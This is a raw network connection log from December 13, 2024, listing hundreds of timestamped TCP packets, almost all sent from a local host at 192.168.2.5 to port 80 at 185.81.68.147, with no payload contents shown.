Dec 13, 2024 01:37:36.063431978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063451052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063473940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063488007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063515902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063538074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063564062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063590050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063606024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063627958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063689947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063719988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063734055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063787937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063815117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063828945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063847065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063862085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063884020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063903093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063924074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063939095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063961029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063980103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063997984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064013004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064038992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064065933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064080000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064105988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064119101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064145088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064158916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064179897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064204931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064219952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064246893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064261913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064285040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064300060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064321041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064344883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064359903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064382076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064395905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064419031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064433098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064457893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064471960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064495087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064508915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064529896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064543962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064569950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064584017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064610004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064625978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064650059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064682007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064706087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064721107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064743996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064763069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064791918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064851046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064863920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064887047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.064955950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065001011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065193892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065218925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065232038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065262079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065287113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065311909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065325975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065351963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065365076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065397978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065428019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065450907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065512896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065563917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065563917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065582037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065608025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065620899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065644979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065701008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065701008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065718889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065727949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065751076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065783024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065802097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065828085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065841913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065861940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065890074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065910101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065969944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065969944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.065988064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066015959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066041946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066056967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066083908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066114902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066140890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066167116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066179991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066205978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066224098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066257000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066273928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066297054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066323042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066338062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066365957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066380978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066407919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066421986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066453934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066477060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066504002 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066518068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066546917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066584110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066612005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066653967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066653967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066670895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066694021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066723108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066752911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066772938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066798925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066824913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066848040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066914082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066914082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066950083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.066994905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067035913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067054987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067076921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067091942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067116022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067141056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067163944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067183971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067203045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067434072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067470074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067486048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067509890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067526102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067549944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067570925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067586899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067606926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067621946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067642927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067722082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067737103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067797899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067814112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067838907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067866087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067893982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067909002 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067933083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067948103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067974091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.067989111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068011999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068027020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068054914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068078995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068094015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068116903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068130016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068152905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068182945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068197966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068223953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068239927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068263054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068327904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068355083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068383932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068399906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068428993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068465948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068480968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068509102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068522930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068558931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068588018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068609953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068644047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068670988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068698883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068722963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068749905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068764925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068787098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068803072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068835020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068850994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068893909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068914890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068942070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068974972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.068988085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069017887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069048882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069067001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069099903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069128990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069153070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069175959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069191933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069224119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069237947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069308043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069340944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069361925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069387913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069402933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069425106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069442034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069468975 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069488049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069509983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069523096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069544077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069556952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069582939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069608927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069623947 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069650888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069664955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069689035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069705009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069727898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069752932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069767952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069797993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069812059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069834948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069849014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069871902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069892883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069912910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069931984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069933891 CET	80	49769	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.069952011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069966078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069996119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.069997072 CET	49769	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070013046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070038080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070051908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070079088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070103884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070117950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070137978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070154905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070175886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070203066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070266008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070266008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070316076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070349932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070382118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070413113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070436001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070456982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070513964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070552111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070566893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070591927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070605040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070631027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070650101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070722103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070749044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070779085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070800066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070835114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070877075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070877075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070893049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070915937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070936918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070960045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070971966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.070996046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071008921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071037054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071060896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071083069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071096897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071116924 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071141958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071156979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071178913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071193933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071216106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071237087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071261883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071275949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071296930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071319103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071331024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071360111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071372986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071403980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071427107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071453094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071481943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071496964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071517944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071557999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071557999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071574926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071599960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071615934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071654081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071706057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071721077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071758032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071784973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071815968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071846008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071860075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071887970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071912050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.071937084 CET	49775	80	192.168.2.5	185.81.68.147
